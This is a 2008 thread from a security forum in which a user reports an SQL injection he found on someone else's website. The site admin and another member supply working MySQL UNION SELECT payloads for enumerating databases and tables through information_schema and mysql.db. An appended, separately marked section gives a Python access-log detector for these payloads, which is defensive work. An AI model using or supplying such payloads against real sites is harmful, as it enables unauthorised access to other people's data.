IT Security and Insecurity Portal

Help with SQL inj ?

Posted: Fri Mar 07, 2008 3:06 pm
nox | Advanced user | Joined: Dec 29, 2007 | Posts: 100 | Location: c://windows/system32

Hey to all, so I have found an SQL injection exploit in a website. I am root, I can access Mysql.user, and the version of Mysql is 5.x.x

and I am trying to find all table names, by

Code:
-1+union+select+table_name+from+information_schema.tables+limit+by+x,y/*

It is working 100%.

So I want to know all DB names by Mysql.db/*
so I tried with this:

Code:
-1+union+select+db+from+mysql.db/*

My problem is that just one DB has been displayed.
I find just this:

'test'

and this:

Code:
-1+union+select+database()+from+mysql.db/*

I find:

'biblithese'

So, how can I find all the other DB names? Thanks a lot.

_________________
..::::[  Waraxe.us is the BEST and the TOP  ]::::..

Posted: Fri Mar 07, 2008 3:49 pm
waraxe | Site admin | Joined: May 11, 2004 | Posts: 2407 | Location: Estonia, Tartu

Try this:

Code:
-1+UNION+SELECT+SCHEMA_NAME+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+2,1--+

Posted: Fri Mar 07, 2008 4:47 pm
nox | Advanced user | Joined: Dec 29, 2007 | Posts: 100 | Location: c://windows/system32

Thank you waraxe, working 100%, but how do I know all the table & column names of a DB, for example 'test'? How?
And thank you.

Posted: Sat Mar 08, 2008 7:11 pm
nox | Advanced user | Joined: Dec 29, 2007 | Posts: 100 | Location: c://windows/system32

Waraxe, I need an answer, please? So?

Posted: Sat Mar 08, 2008 7:21 pm
maku234 | Regular user | Joined: Jun 03, 2007 | Posts: 21 | Location: estonia

1+union+select+table_name+from+information_schema.tables+where+TABLE_SCHEMA=test+limit+by+x,y/*
I'm not sure that it works.

Posted: Sun Mar 09, 2008 6:43 am
nox | Advanced user | Joined: Dec 29, 2007 | Posts: 100 | Location: c://windows/system32

Thank you maku234, it works, but with [ '' ]

Code:
1+union+select+table_name+from+information_schema.tables+where+TABLE_SCHEMA='test'+limit+by+x,y/*

Thanks a lot ...

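For defenders, the requests quoted in this thread leave a recognisable trace in web server access logs: a UNION SELECT that names information_schema or the mysql system database, with '+' standing in for spaces and a comment marker at the end. The following is an added example, not part of the original thread, that grades access-log lines on those signals; the log lines, addresses, paths and parameter names are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# MySQL metadata sources that a normal application query string has no reason to name.
METADATA = re.compile(r"\b(information_schema\.(schemata|tables|columns)|mysql\.(db|user))\b", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
# Comment marker at the end of the value, used to cut off the rest of the original statement.
TRAILING_COMMENT = re.compile(r"(/\*|--\s*)$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (severity, reasons) for one access-log line; severity is None if nothing matched."""
    match = REQUEST.search(log_line)
    if not match:
        return None, []
    # Decode percent-encoding and turn '+' back into spaces before matching.
    query = unquote_plus(urlsplit(match.group(1)).query)
    reasons = []
    if UNION_SELECT.search(query):
        reasons.append("union-select")
    if METADATA.search(query):
        reasons.append("metadata-table")
    if reasons and TRAILING_COMMENT.search(query):
        reasons.append("trailing-comment")
    if "union-select" in reasons and "metadata-table" in reasons:
        return "high", reasons
    # A single signal can be ordinary text (see the search request below), so grade it lower.
    return ("medium", reasons) if reasons else (None, [])

# Constructed sample lines: addresses, paths and parameter names are made up;
# the injected values are the ones quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Mar/2008:15:01:12 +0000] "GET /item.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [07/Mar/2008:15:02:40 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 7310',
    '198.51.100.7 - - [07/Mar/2008:15:06:03 +0000] "GET /item.php?id=-1+union+select+table_name+from+information_schema.tables+limit+by+x,y/* HTTP/1.1" 200 4891',
    '198.51.100.7 - - [07/Mar/2008:15:06:41 +0000] "GET /item.php?id=-1+union+select+db+from+mysql.db/* HTTP/1.1" 200 4650',
    '198.51.100.7 - - [07/Mar/2008:15:49:55 +0000] "GET /item.php?id=-1+UNION+SELECT+SCHEMA_NAME+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+2,1--+ HTTP/1.1" 200 4702',
]

def scan(lines):
    """Yield (line_number, severity, reasons) for every line that matched a signal."""
    for number, line in enumerate(lines, start=1):
        severity, reasons = classify(line)
        if severity:
            yield number, severity, reasons

if __name__ == "__main__":
    for number, severity, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {severity} ({', '.join(reasons)})")
```

A "high" hit that was answered with status 200 is worth correlating with the database account the application connects as, since reading mysql.db and mysql.user, as described in the first post, is only possible when that account holds far more privilege than the application needs.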